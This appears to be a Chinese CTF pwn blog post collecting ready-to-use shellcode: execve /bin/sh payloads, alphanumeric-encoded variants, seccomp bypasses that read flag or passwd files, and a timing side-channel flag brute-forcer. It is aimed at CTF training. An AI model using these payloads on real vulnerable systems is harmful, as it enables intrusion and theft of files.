CTF中pwn shellcode题目

最新推荐文章于 2025-04-15 16:51:30 发布
原创 最新推荐文章于 2025-04-15 16:51:30 发布 · 845 阅读 · 20 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

CTF中pwn shellcode题目

下面是一些shellcode代码和绕过技巧。

一些只给payload或者exp一把梭

基础

基础shellcode
shellcode = asm(shellcraft.sh())
生成指定函数

用法:

shellcode = shellcraft.function(arg1, arc2...)

示例:

shellcode = shellcraft.open('./flag')
32位 纯ascii字符shellcode
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA
64位 纯ascii字符shellcode
Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t
Alpha3

(例题:ctfshow pwn 65)

限制只能使用字母或者数字
alpha3使用:
alpha3需要python2环境,所以先安装python2

from pwn import *
context.arch='amd64'
sc = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x31\xc0\xb0\x3b\x99\x0f\x05"
with open("./sc.bin",'wb') as f:
    f.write(sc)
     
python2 ALPHA3.py x64 ascii mixedcase rdx --input="sc.bin" > out.bin 

因为 call rdx ,所以 base 是 rdx,得到

可以选择架构、编码、限制的字符

AE64

AE64可以直接在python中导入,使用相对较为方便且限制较少

from ae64 import AE64
from pwn import *
context.arch='amd64'

# get bytes format shellcode
shellcode = asm(shellcraft.sh())

# get alphanumeric shellcode
enc_shellcode = AE64().encode(shellcode)
print(enc_shellcode.decode('latin-1'))
最短shellcode

64位:

xor 	rsi, rsi
push	rsi	
mov 	rdi, 0x68732f2f6e69622f
push	rdi
push	rsp		
pop	    rdi			
mov 	al,	59	
cdq				
syscall

// int
0x622fbf4856f63148
0x545768732f2f6e69
0x050f993bb05f

// bytes
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05

32位:

getshell - 21字节

# (execve("/bin/sh",NULL,NULL))
shellcode = asm("""
    push 0x68732f
    push 0x6e69622f
    mov ebx,esp
    xor ecx,ecx
    xor edx,edx
    push 11
    pop eax
    int 0x80
""")

ORW

open(fopen、creat、openat、openat2、fopen64、open64、freopen)

#openat2系统调用在 Linux 内核版本 5.6 中引入 内核版本太低用不上
shellcode=asm(shellcraft.openat2(-100,flag_addr,flag_addr+0x20,0x18))

read(pread、readv、preadv、preadv2、splice、sendfile、mmap)

write(pwrite、send、writev)

1.只ban了 open函数

攻击方式 利用openat 函数

1.系统调用号是257

2.int openat(int dirfd, const char *pathname, int flags);只需要构造openat(0, ‘/flag\x00’)

push 0x67616c66				//flag			
    mov rsi,rsp
    xor rdx,rdx
    mov rdi,0xffffff9c			//这个位置rdi要设置为0xfffff9c,原理不写了
    push 257
    pop rax
    syscall
    mov rdi,rax
    mov rsi,rsp
    mov edx,0x100
    xor eax,eax
    syscall
    mov edi,1
    mov rsi,rsp
    push 1
    pop rax
    syscall

或者

sh = shellcraft.openat(-100,"/flag",0)

2.没有R和W

利用sendfile来打,sendfile兼备read和write的效果

来看看它的C代码

ssize_t sendfile(int out_fd, int in_fd, off_t *offset, size_t count);

sendfile是一个用于在文件描述符之间高效传输数据的系统调用,它在两个文件描述符之间传输数据而不需要在用户空间进行数据缓冲,从而提高性能

out_fd表示的是目标文件描述符。数据将被写入到这个文件描述符,一般来是stdout(做堆的师傅们应该常见这玩意),用于输出到屏幕,可以粗略理解为write的fd

in_fd是源文件描述符,数据将从这个文件描述符读取,可以粗略理解为read的fd为3的情况

offset不必多言,就是从文件内容offset字节处开始读取

count也不必多言,n_bytes

sh = shellcraft.openat(-100,"/flag",0)+shellcraft.sendfile(1,3,0,0x100)
sl(asm(sh))

或者可以用下面的经过AE64处理过的

from pwn import *
from ae64 import AE64

context(log_level='debug',arch='amd64', os='linux')
sh = shellcraft.openat(-100,"/etc/passwd",0)
sh += shellcraft.sendfile(1,3,0,0x50)
payload = AE64().encode(asm(sh),"rdx")

3.禁用open/read/write绕过

绕过方式:利用其他函数替代open/read/write,如下

openat + mmap + sendfile

shellcode = shellcraft.openat(0,'/flag',0)
shellcode += shellcraft.mmap(0x10000,0x100,1,1,'eax',0)
shellcode += shellcraft.sendfile(1,3,0,0x100)
shellcode = asm(shellcode)

openat + preadv2 + writev

shellcode = asm('''
        /* openat(fd=-0x64, file='flag', oflag=0) */
        add rax, 0x62
        mov r12, rax
        mov rsi, rax
        mov rdi, -0x64
        /* 调用openat*/
        mov rax, 0x101 /* 0x101 */
        syscall
        
        /* preadv2(vararg_0=3, vararg_1=0x1337090, vararg_2=1, vararg_3=0, vararg_4=0) */
        mov rdi, 3
        mov rdx, 0x1
        add r12, 0x15
        mov rsi, r12
        /* 调用preadv2*/
        mov rax, 327
        syscall
        
        /* writev(fd=1, iovec=0x1337090, count=1) */
        mov rdi, 1
        mov rdx, 0x1
        /* 调用writev*/
        mov rax, 0x14
        syscall
''')

4 禁用输出绕过

绕过方式:使用侧信道逐位爆破,当爆破字符和flag对应字符一致时进入死循环,通过接收回显的时间间隔判断爆破是否正确

from pwn import *
import string

# 这里的pwn只是为了演示流程,具体逻辑还得看题目
def pwn(p, index, ch):
    code = "push 0x67616c66; mov rdi, rsp; mov rsi, 0x0; mov rax, 0x2; syscall;"  # open
    code += "mov rdi, 0x3; mov rsi, rsp; mov rdx, 0x30; mov rax, 0x0; syscall;"   # read
    code += "cmp byte ptr[rsi+{}], {}; jz loop;".format(index, ch)                # cmp
    code += "xor edi, edi; mov rax, 60; syscall; loop: jmp loop;"                 # 等则进入死循环,否则exit(0)
    code = b"\\\\x90"*20+asm(code)  # 前面加了\\\\x90滑板

    p.send(code)

def main():
    flag = ""
    flag_str = string.printable
    for offset in range(0x30):
        index = 0
        while True:
            p = process("./babystack")
            try:
                ch = flag_str[index]
                print(">>>>>>>>>>> test ch {}".format(ch))
                pwn(p, offset, ord(flag_str[index]))
                p.recv(timeout=1)
                flag += ch
                print(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> find flag: ", flag)
                p.close()
                index += 1
                break
            except Exception as e:
                # 捕获p.recv产生的错误
                print("="*10)
                print(e)
                print("="*10)
                try:
                    p.close()
                    index += 1
                except Exception as e:
                    # 捕获p.close产生的错误
                    print("="*10)
                    print(e)
                    print("="*10)
                    continue
        if flag[-1] == "}":
            # 判断flag是否已经结束
            break

main()
CTF-PWN练习之执行Shellcode
ChuMeng1999的博客
01-05 1656
目录预备知识一、相关实验二、Shellcode三、执行Shellcode实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 本实验要求实验者具备如下的相关知识。 一、相关实验 本实验要求您已经认真学习和完成了《CTF PWN练习之返回地址覆盖》。 二、Shellcode Shellcode指缓冲区溢出攻击中植入进程的恶意代码,这段代码可以弹出一个消息框,也可以在目标机器上打开一个监听端口,甚至是删除目标机器上的重要文件等。 Shellcode通常需要使用汇编语言进
CTF——PWN——栈溢出(3.Easy_ShellCode
qq_45215609的博客
09-18 845
CTF——PWN——栈溢出(3.Easy_ShellCode),bss段上的ret2shellcode
PWNshellcode技巧newstar2023三道shellcode
m0_74312867的博客
01-27 714
我什么都不会
pwn题一把梭工具源代码part1
最新发布
cyy001128的博客
04-15 1094
这个工具说实话不是很好用,之前在某🐟上看到还要卖10块钱,现在公众号发了开源了,一开始尝试了几个签到题都没有跑出来,拿原本的测试文件发现没问题,找了五六题才发现一个可以用的,确实可以一把梭,但是没那么全面吧,就想着看看那个源码分析一下,说不定后期可以自己改改,搞一个更好的工具,由于这个代码太长了2400行之多,这里就分段理解一下前面的检查机制,后续还会看看攻击阶段能不能改一下。的 gadget,说明副作用多,需要额外控制寄存器,用other_rdi_registers标记副作用。
shellcode基本知识(PWN
weixin_51758733的博客
07-15 1054
shellcode基本知识(PWN
二进制学习(pwn)-shellcode
liulanghouzi的博客
09-21 1916
帮助二进制安全爱好者入门~
简单的PWN学习-ret2shellcode
weixin_48421613的博客
07-05 1010
最近在学习pwn,这是一道2016年的pwn题目,主要学习关于栈溢出以及劫持栈指针达到命令执行的效果,笔者水平较差,请轻喷
PWN知识点整理(1)Shellcode
qq_52469954的博客
10-26 358
0day安全:软件漏洞分析技术(第2版)
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.youkuaiyun.com/A951860555/article/details/110350773
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.youkuaiyun.com/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
跟着CTF-wiki学pwn——ret2shellcode
qq_42882717的博客
07-01 1026
CTF-wiki的注解:ret2shellcode
字符串溢出(pwn溢出)--ret2shellcode
莫慌的博客
09-26 2279
pwn 入门
PWNShellcode
m0_57836225的博客
11-18 825
Shellcode 的原理是利用程序中的漏洞(如缓冲区溢出等),将精心构造的机器码注入到程序的内存空间中。栈溢出是一种常见的软件漏洞类型,当程序向栈中写入的数据超过了栈的缓冲区边界时就可能发生。它是后续深入学习 PWN 技术、理解和利用多种安全漏洞的重要基础,在漏洞利用领域有广泛的研究和应用。Shellcode 是一段用于利用软件漏洞的机器码,通常被注入到存在漏洞的程序中,以获取目标系统的控制权或执行特定的恶意操作,是 PWN 攻击中关键的技术元素之一。的系统调用号),然后通过。寄存器为相应的参数,
Shellcode的生成和利用
qq_43390703的博客
03-08 5771
from pwn import * #pwntool生成shellcode shellcode=asm(shellcraft.sh()) shellcode = “\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05”(23字节) ...
PWN-shellcode
MuMuLee_的博客
09-26 1952
构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖掉正常的返回地址。 题目: 1Ch=16+12=28,+esp=32:偏移量是32 能溢出:100-0x1c-4=68字节 C伪代码: 理论基础 函数返回步骤 : 保存返回值:函数返回值保存在EAX寄存器 弹出当前栈帧,恢复上一个栈帧 a) ESP + 当前栈帧大小:堆栈平衡基础上,降低栈顶,回收当前栈帧空间...
PWN入门(6)写入shellcode
Ba1_Ma0的博客
09-20 2285
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入05文件夹。
[GDOUCTF 2023]Shellcode 全网最详细write up
qq_41937545的博客
11-02 1069
64 位 较短的 shellcode -> 23 字节 \x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f \x05】​。32 位 短字节 shellcode -> 21 字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80。并且没有后门没有system。
PWN-ret2shellcode原理
m0_64180167的博客
04-17 646
我们之前做过很简单的pwn题目buuctf-rip这种 是在程序中存在shellcode 直接返回地址改为这个shellcode的地址即可但是如果程序里面没有呢这种类型就是ret2shellcode
pwn学习】pwn中的简单shellcode
Morphy_Amo的博客
12-20 1402
编写简单的shellcode 在linux32位系统中,最简单的获取shell的方式是通过系统调用execve获得 execve('/bin/sh',0,0); 写成汇编的话如下: global _start _start: xor edx, edx xor ecx, ecx push '/sh' push '/bin' mov ebx, esp mov eax, 0xb int 80h 编译
pwn shellcode
05-19
Pwn shellcode是一种用于漏洞利用的机器码,常用于执行特定操作的代码。下面是一个简单的pwn shellcode示例: ```assembly section .text global _start _start: xor eax, eax ; 设置eax寄存器为0,清空寄存器 xor ebx, ebx ; 设置ebx寄存器为0 push eax ; 将0压入栈中 push 0x68732f2f ; 将字符串 "//sh" 压入栈中 push 0x6e69622f ; 将字符串 "/bin" 压入栈中 mov ebx, esp ; 将ebx寄存器设置为栈顶指针,即字符串 "/bin//sh" push eax ; 将0压入栈中 mov eax, 11 ; 将eax寄存器设置为11,即execve系统调用的编号 int 0x80 ; 执行系统调用 ``` 这段代码将字符串 "/bin//sh" 作为参数调用 execve 系统调用,打开一个 shell。可以将这段代码编译成二进制形式,并将其插入到目标程序的漏洞点上,从而实现对目标程序的控制。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

saulgoodman-q

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值